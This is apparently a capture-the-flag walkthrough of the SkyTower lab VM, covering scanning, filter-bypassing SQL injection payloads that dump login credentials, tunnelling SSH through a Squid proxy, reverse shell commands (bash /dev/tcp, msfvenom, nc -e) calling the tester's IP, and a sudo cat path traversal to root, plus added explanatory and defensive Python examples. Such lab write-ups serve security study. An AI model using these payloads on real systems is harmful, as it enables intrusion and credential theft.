
Vulnhub-SkyTower

Target VM download link

0x01 Information gathering

nmap scan

nmap -p22,80,3128 -sC -sV -O 192.168.56.3

Nmap scan report for 192.168.56.3
Host is up (0.00083s latency).

PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.12 seconds

Directory scan

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/background (Status: 200)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/login.php (Status: 200)
/server-status (Status: 403)

nikto scan

nikto -h http://192.168.56.3
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.3
+ Target Hostname: 192.168.56.3
+ Target Port: 80
+ Start Time: 2020-07-12 12:44:05 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 19:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8346 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2020-07-12 12:44:36 (GMT8) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

0x02 Exploitation

SQL injection

After some poking around I found that the login form on the home page is vulnerable to SQL injection, and that the filter strips "or" out of the input. Not only that, it also strips "select", commas, "=" and "and". I was dumbfounded. Because each keyword is deleted in a single pass, writing "oorr" leaves "or" behind once the inner "or" is removed, and the same trick yields "sselectelect", "aandnd", "infoorrmation_schema" and "passwoorrd"; JOINed derived tables stand in for the commas of a UNION column list, and LIKE stands in for "=".

sql-post
email=' oorrder by 3 # &password=1

email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect 2)b JOIN (sselectelect 3)c) # &password=1

email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect version())b JOIN (sselectelect 3)c) # &password=1

email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect database())b JOIN (sselectelect 3)c) # &password=1

email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(table_name) from infoorrmation_schema.tables where table_schema like 'SkyTech' )b JOIN (sselectelect 3)c) # &password=1

email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(column_name) from infoorrmation_schema.columns where table_schema like 'SkyTech' aandnd table_name like 'login')b JOIN (sselectelect 3)c) # &password=1

email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(email) from login)b JOIN (sselectelect group_concat(passwoorrd) from login)c) # &password=1
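To see why the doubled keywords above come out as valid SQL, here is an added example (my code, not the post's and not SkyTower's login.php) that models the filter the post describes as a single, non-recursive deletion pass over "select", "and", "or", "," and "=", runs the post's tokens through it, and contrasts a string-concatenated login query with a parameterised one against an in-memory SQLite table. The filter's case-insensitivity and removal order, the shape of the query, the table rows, and the SQLite-flavoured payload (LIKE for the banned "=", "-- " for MySQL's "#") are all assumptions of the example.

```python
import re
import sqlite3

# Blacklist modelled on the post's description: one non-recursive deletion
# pass per banned token. Case-insensitive matching and this removal order
# are assumptions; the real login.php is not shown in the post.
BANNED = ["select", "and", "or", ",", "="]


def naive_filter(s):
    """The weak filter: delete each banned token once, left to right."""
    for token in BANNED:
        s = re.sub(re.escape(token), "", s, flags=re.IGNORECASE)
    return s


def recursive_filter(s):
    """Repeat until nothing changes. This defeats keyword doubling, but it
    is still a blacklist: anything not on the list still goes through."""
    stripped = naive_filter(s)
    while stripped != s:
        s, stripped = stripped, naive_filter(stripped)
    return s


def vulnerable_query(email, password):
    """Assumed shape of the vulnerable query: concatenation after filtering."""
    return ("SELECT * FROM login WHERE email='%s' AND password='%s'"
            % (naive_filter(email), naive_filter(password)))


# Constructed rows; not the contents of the SkyTower database.
SCHEMA = """
CREATE TABLE login (id INTEGER, email TEXT, password TEXT);
INSERT INTO login VALUES (1, 'alice@example.com', 'correct horse');
INSERT INTO login VALUES (2, 'bob@example.com', 'battery staple');
"""


def emails_for(query, params=()):
    """Run one query against a throwaway in-memory copy of the table."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return [row[1] for row in con.execute(query, params)]


def login_vulnerable(email, password):
    return emails_for(vulnerable_query(email, password))


def login_safe(email, password):
    # The actual fix: input is bound as data and never parsed as SQL,
    # so no keyword blacklist is needed at all.
    return emails_for("SELECT * FROM login WHERE email=? AND password=?",
                      (email, password))


# SQLite flavour of the post's trick: the doubled "oorr" survives the single
# pass as "or", LIKE stands in for the banned "=", "-- " replaces MySQL's "#".
PAYLOAD = "' oorr 1 LIKE 1 -- "
```

login_vulnerable(PAYLOAD, "x") returns every row because the filtered string becomes "' or 1 LIKE 1 -- " inside the query, while login_safe(PAYLOAD, "x") returns nothing: the same bytes are compared as a literal e-mail address. Making the filter recursive only closes the doubling trick; a keyword blacklist is never the fix.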

After successfully dumping the database, the page that comes back turns out to be a hint to log in over SSH, and the passwords are already there. Through the same injection point I read /etc/passwd and confirmed that the three users do exist. The next question is how to get in, because port 22 is protected by a firewall.

Connect through the target's Squid HTTP proxy with proxychains.

Set up the proxy

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 192.168.56.3 3128
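What the "http 192.168.56.3 3128" entry makes proxychains do is send an HTTP CONNECT request to Squid and, once Squid answers 200, push the raw SSH bytes through that tunnel; the firewall only ever sees Squid itself talking to 22/tcp. The added example below (my code, not the post's, and not SkyTower's Squid configuration) implements that exchange in plain Python against a fake Squid and a fake sshd on loopback ports, so it runs offline, and also shows the failure case worth checking first: a Squid that only permits CONNECT to an allowlist of ports answers 403, and proxychains will then never reach port 22. Hostnames, ports, the banner string and the allowlist are constructed.

```python
import socket
import threading

# Constructed banner for the fake sshd; the real box's banner is not in the post.
BANNER = b"SSH-2.0-OpenSSH_demo\r\n"


def serve_once(handler):
    """Listen on an ephemeral loopback port, serve one client in a thread,
    and return the port so the client side can be driven synchronously."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            handler(conn)
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def fake_sshd(conn):
    """Stand-in for the firewalled 22/tcp: send the banner, then hang up."""
    conn.sendall(BANNER)


def fake_squid(allowed_ports):
    """Stand-in for Squid's CONNECT handling with a destination-port allowlist
    (assumed; the real squid.conf is not shown). Only the upstream-to-client
    direction is relayed, which is all the banner check needs."""
    def handler(conn):
        rfile = conn.makefile("rb")
        request_line = rfile.readline().decode()
        while rfile.readline().strip():  # skip request headers
            pass
        method, target, _version = request_line.split()
        host, port = target.rsplit(":", 1)
        if method != "CONNECT" or int(port) not in allowed_ports:
            conn.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\n")
            return
        with socket.create_connection((host, int(port))) as upstream:
            conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
            while True:
                chunk = upstream.recv(4096)
                if not chunk:
                    break
                conn.sendall(chunk)
    return handler


def http_connect(proxy, dest, timeout=5):
    """What proxychains does for an 'http' ProxyList entry: ask the proxy to
    CONNECT to dest and hand back the tunnel once it answers 200."""
    sock = socket.create_connection(proxy, timeout=timeout)
    host, port = dest
    sock.sendall(("CONNECT %s:%d HTTP/1.1\r\nHost: %s:%d\r\n\r\n"
                  % (host, port, host, port)).encode())
    rfile = sock.makefile("rb")           # keep reading through this buffer
    status_line = rfile.readline().decode().rstrip()
    while rfile.readline().strip():       # skip response headers
        pass
    if status_line.split()[1] != "200":
        sock.close()
        raise ConnectionError("proxy refused CONNECT to %s:%d: %s"
                              % (host, port, status_line))
    return sock, rfile


def ssh_banner_via_proxy(proxy, dest):
    """First line the far end sends through the tunnel; 'SSH-2.0-...' means
    the proxy really does reach the filtered port."""
    sock, rfile = http_connect(proxy, dest)
    with sock:
        return rfile.readline().decode().rstrip()


def demo(allowed_ports=None):
    """Run the exchange against the fakes. With the default allowlist the
    banner comes back; with an allowlist that excludes the sshd port the
    proxy answers 403 and the error text is returned instead."""
    ssh_port = serve_once(fake_sshd)
    allowed = {ssh_port} if allowed_ports is None else allowed_ports
    proxy_port = serve_once(fake_squid(allowed))
    try:
        return ssh_banner_via_proxy(("127.0.0.1", proxy_port),
                                    ("127.0.0.1", ssh_port))
    except ConnectionError as err:
        return str(err)
```

On the real target the equivalent one-line check is curl -v --proxytunnel -x http://192.168.56.3:3128 telnet://192.168.56.3:22, which should print "HTTP/1.1 200 Connection established" followed by the SSH banner; a 403 at that point means Squid's http_access rules do not allow CONNECT to port 22 and the proxychains route is closed.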

Then proxychains ssh john@192.168.56.3. But the session drops immediately; after googling, my guess was that the target has UsePAM yes set. I tried all three users: only william failed to log in at all, while sara and john are kicked out as soon as the connection is established.

In that case, what about passing ssh a command to run right at login?

Popping a shell

First I tried a bash reverse shell

proxychains ssh john@192.168.56.3 "bash -c 'bash -i >& /dev/tcp/192.168.56.254/1234 0>&1'"

Unfortunately that did not work: as soon as the command ran, the listener did receive a connection, but both ends exited. Even though the reverse shell failed, what about a bind shell instead?

Sure enough, I got a shell.

Trying other reverse shell commands

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.254 LPORT=1234
0<&177-;exec 177<>/dev/tcp/192.168.56.254/1234;sh <&177 >&177 2>&177

p4 ssh john@192.168.56.3 "0<&177-;exec 177<>/dev/tcp/192.168.56.254/1234;sh <&177 >&177 2>&177"

This command worked too (p4 here is presumably a shell alias for proxychains4). Note that both payloads that work run a plain sh over a file descriptor, while the one that failed was an interactive bash -i; something in bash's interactive startup, such as an exit in the user's .bashrc, would produce exactly that pattern, though the post does not verify it.

nc reverse shell works as well

p4 ssh john@192.168.56.3 "nc 192.168.56.254 1234 -e /bin/sh"

0x03 Privilege escalation

After getting the reverse shell I did some enumeration as john but found nothing special. Then I switched to sara and found that this user can run sudo.

She is allowed to run /bin/cat on any file under /accounts, and because the wildcard in that rule also matches "..", we can simply

sudo cat /accounts/../root/flag.txt
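Why the traversal above works: sudoers matches command-line arguments with fnmatch-style wildcards, and "*" there also matches "/" and "..", so /accounts/../root/flag.txt satisfies a rule written for /accounts/*. The added example below (my code, not the post's; sara's actual sudo -l output is not shown, so the rule is assumed to be /bin/cat /accounts/*) reproduces that match in Python and pairs it with the check a wrapper script should make instead, resolving the path and confirming it stays under the intended directory. The sample paths are constructed.

```python
import fnmatch
import os

# Assumed rule: sara may run /bin/cat on anything matching /accounts/*.
# sudo applies fnmatch(3) to arguments, where "*" also matches "/" and "..",
# which is exactly what the post's command relies on.
ALLOWED_PATTERN = "/accounts/*"
INTENDED_DIR = "/accounts"


def sudoers_arg_matches(pattern, arg):
    """fnmatch-style match as sudo applies it to a command-line argument."""
    return fnmatch.fnmatchcase(arg, pattern)


def escapes_directory(base, path):
    """True when path resolves outside base. realpath also follows symlinks,
    so a link planted inside /accounts cannot smuggle a file out either."""
    base = os.path.realpath(base)
    target = os.path.realpath(path)
    return os.path.commonpath([base, target]) != base


def audit(paths):
    """For each path: (allowed by the sudo glob, escapes the intended dir).
    (True, True) is the dangerous combination the wildcard rule permits."""
    return {p: (sudoers_arg_matches(ALLOWED_PATTERN, p),
                escapes_directory(INTENDED_DIR, p)) for p in paths}


SAMPLE = [                             # constructed requests
    "/accounts/john.txt",              # what the rule is meant to allow
    "/accounts/../root/flag.txt",      # the post's traversal
    "/accounts/./../etc/shadow",       # same trick, another target
    "/root/flag.txt",                  # rejected by the glob itself
]
```

The safe sudoers fix is to avoid wildcards in arguments altogether, or to grant a small wrapper script that performs the escapes_directory check before reading anything on the user's behalf.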

0x04 Summary

Try more approaches. bash -c 'bash -i ...' is not a silver bullet.

References

- SQLi: bypassing filters on commas, spaces and field names
- Fixing ssh sessions that exit immediately after login